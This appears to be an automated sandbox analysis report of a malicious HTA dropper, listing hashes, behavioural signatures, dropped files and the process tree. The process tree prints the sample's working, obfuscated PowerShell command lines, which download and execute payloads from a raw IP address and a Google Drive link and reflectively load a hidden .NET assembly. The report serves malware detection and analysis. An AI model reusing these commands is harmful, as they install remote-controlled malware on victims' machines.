Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
26-10-2024 03:14
Static task
static1
Behavioral task
behavioral1
Sample
fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Resource
win10v2004-20241007-en
General
-
Target
fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
-
Size
204KB
-
MD5
9dbf5ee2610284f5668fb229ba474b95
-
SHA1
12b3f4c93e36b9bca1bfecf8fa522748d3631c74
-
SHA256
fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0
-
SHA512
06fe1b0e3ca4e04108fa8a50f60867e42f38e60768aebbc8935a7c24b973cf3546f6f7f4548e9fac67cebe552319d7323fee5eeaa87dc5f958aa23377cb3ccb2
-
SSDEEP
96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2784 pOweRSheLl.ExE 6 2864 powershell.exe 8 2864 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2864 powershell.exe 3000 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2784 pOweRSheLl.ExE 2064 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOweRSheLl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2784 pOweRSheLl.ExE 2064 powershell.exe 2784 pOweRSheLl.ExE 2784 pOweRSheLl.ExE 3000 powershell.exe 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2784 pOweRSheLl.ExE Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2784 2952 mshta.exe 30 PID 2952 wrote to memory of 2784 2952 mshta.exe 30 PID 2952 wrote to memory of 2784 2952 mshta.exe 30 PID 2952 wrote to memory of 2784 2952 mshta.exe 30 PID 2784 wrote to memory of 2064 2784 pOweRSheLl.ExE 32 PID 2784 wrote to memory of 2064 2784 pOweRSheLl.ExE 32 PID 2784 wrote to memory of 2064 2784 pOweRSheLl.ExE 32 PID 2784 wrote to memory of 2064 2784 pOweRSheLl.ExE 32 PID 2784 wrote to memory of 2500 2784 pOweRSheLl.ExE 33 PID 2784 wrote to memory of 2500 2784 pOweRSheLl.ExE 33 PID 2784 wrote to memory of 2500 2784 pOweRSheLl.ExE 33 PID 2784 wrote to memory of 2500 2784 pOweRSheLl.ExE 33 PID 2500 wrote to memory of 2512 2500 csc.exe 34 PID 2500 wrote to memory of 2512 2500 csc.exe 34 PID 2500 wrote to memory of 2512 2500 csc.exe 34 PID 2500 wrote to memory of 2512 2500 csc.exe 34 PID 2784 wrote to memory of 2340 2784 pOweRSheLl.ExE 36 PID 2784 wrote to memory of 2340 2784 pOweRSheLl.ExE 36 PID 2784 wrote to memory of 2340 2784 pOweRSheLl.ExE 36 PID 2784 wrote to memory of 2340 2784 pOweRSheLl.ExE 36 PID 2340 wrote to memory of 3000 2340 WScript.exe 37 PID 2340 wrote to memory of 3000 2340 WScript.exe 37 PID 2340 wrote to memory of 3000 2340 WScript.exe 37 PID 2340 wrote to memory of 3000 2340 WScript.exe 37 PID 3000 wrote to memory of 2864 3000 powershell.exe 39 PID 3000 wrote to memory of 2864 3000 powershell.exe 39 PID 3000 wrote to memory of 2864 3000 powershell.exe 39 PID 3000 wrote to memory of 2864 3000 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\djvb2aru.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES713B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC713A.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2512
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5dc1739739654bccab033baab240ebe52
SHA14ee3a93bbc458251ba539a114260b3d0fd791c7a
SHA256e9dc32b701c8c4ad32c86e7564db7ceaefae8b968d753874293efc6c62b40f44
SHA512f32fd27194cee9a5e6f0038d34cbee13fd142c11d0627c6f9e376da39b791c4e5d0789d96bc1f5f8fe099170d15305910b2a8f9537f864bab93410c3708eb184
-
Filesize
3KB
MD53dfb950a473940ace32a7c867ccf9076
SHA1bf279fcb4c105e5923900173ea70c10e42e97cf5
SHA25666beb4d8277c96ace1e07e669723305df351c1646d57cc49c1622a2efb9bc70e
SHA5128cc7b3612bba28fd96430fa1e77517ebc86d69d452fab9a73d7fc880bff1690f02a9e639e6bdc2de2b387c9707c14be208da3b040b2c2c1f6f910fcb973796bd
-
Filesize
7KB
MD547d28c521ffd10fda60ff9c87ea3662c
SHA111bab85687d8010b0aeb23c1e5ff1d93a23e2f1b
SHA2567a39e328db7bca2da514b1b75d09f9b40e01ca7d6dc73762353228698ecbee82
SHA5128e3174ba7543ea7c03c31c2fcd9d9fd26b75d0f1e94674d90486e6319b334cfb255d742cd765cb660caf1a180f503ef5cf25f1771cad2cc99c2fb3d2077efc9a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5802344128fe036532b119b67f3453e1d
SHA1ae2000823fe69a49698c0ae65c0443b5e5c8b615
SHA25660cc1bbd7cccf36d1d1fa00b7559deb5e407641f91e722de48b247c4eb4ce39c
SHA5124c4f23a5e2fcf3acc7670cc17a31af47cdd1849dbbc16622234bd33175f35096f572add5e14dd5b8636268d14b75f4d340a6aefa85ced38b9531bf36b9ea02a6
-
Filesize
136KB
MD574339d80989d10693dbc1115d1cf3eb4
SHA1bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44
SHA256a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d
SHA5124befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba
-
Filesize
652B
MD54ab336f87777597298ef2d5585f4c30b
SHA17cda2d4dc4e0b57568269881ee23b0473c53252a
SHA256b04b54fd4d61d20b15624be12b63935bda4e86440220c98da8ff3dc5d4ba3532
SHA5125174ad02bdd7471df99713d5a769bc51effd2e0ee7390c73393aa561504f1cd969230141e5f987f6d37e8c345f28ee916c05fa6bd0ec786c5d6773aa1c46e21d
-
Filesize
480B
MD5ce22e90871744b25a04ac8c5691f49cc
SHA1bc0a93c1fe61e00daa34774994b638d19f735228
SHA2563b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546
SHA5125f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88
-
Filesize
309B
MD547ccea66770dd69f044feeb829203f4a
SHA11b89af4daeb211bbee5feaec1cb3c2796d6033d6
SHA2563edc2445b884bfc912b9e2d3ef054c55bb400c806a120c421ee5b41f3e83bd9d
SHA512f5e626e3d4ed089ee1e68d55d3cd9123b643b0af73530ad4a9dc914c4450665a7a0de38d1d69e8fa03d4b25e232dc46b7802a8014627ead6216792bc9a7b8b4e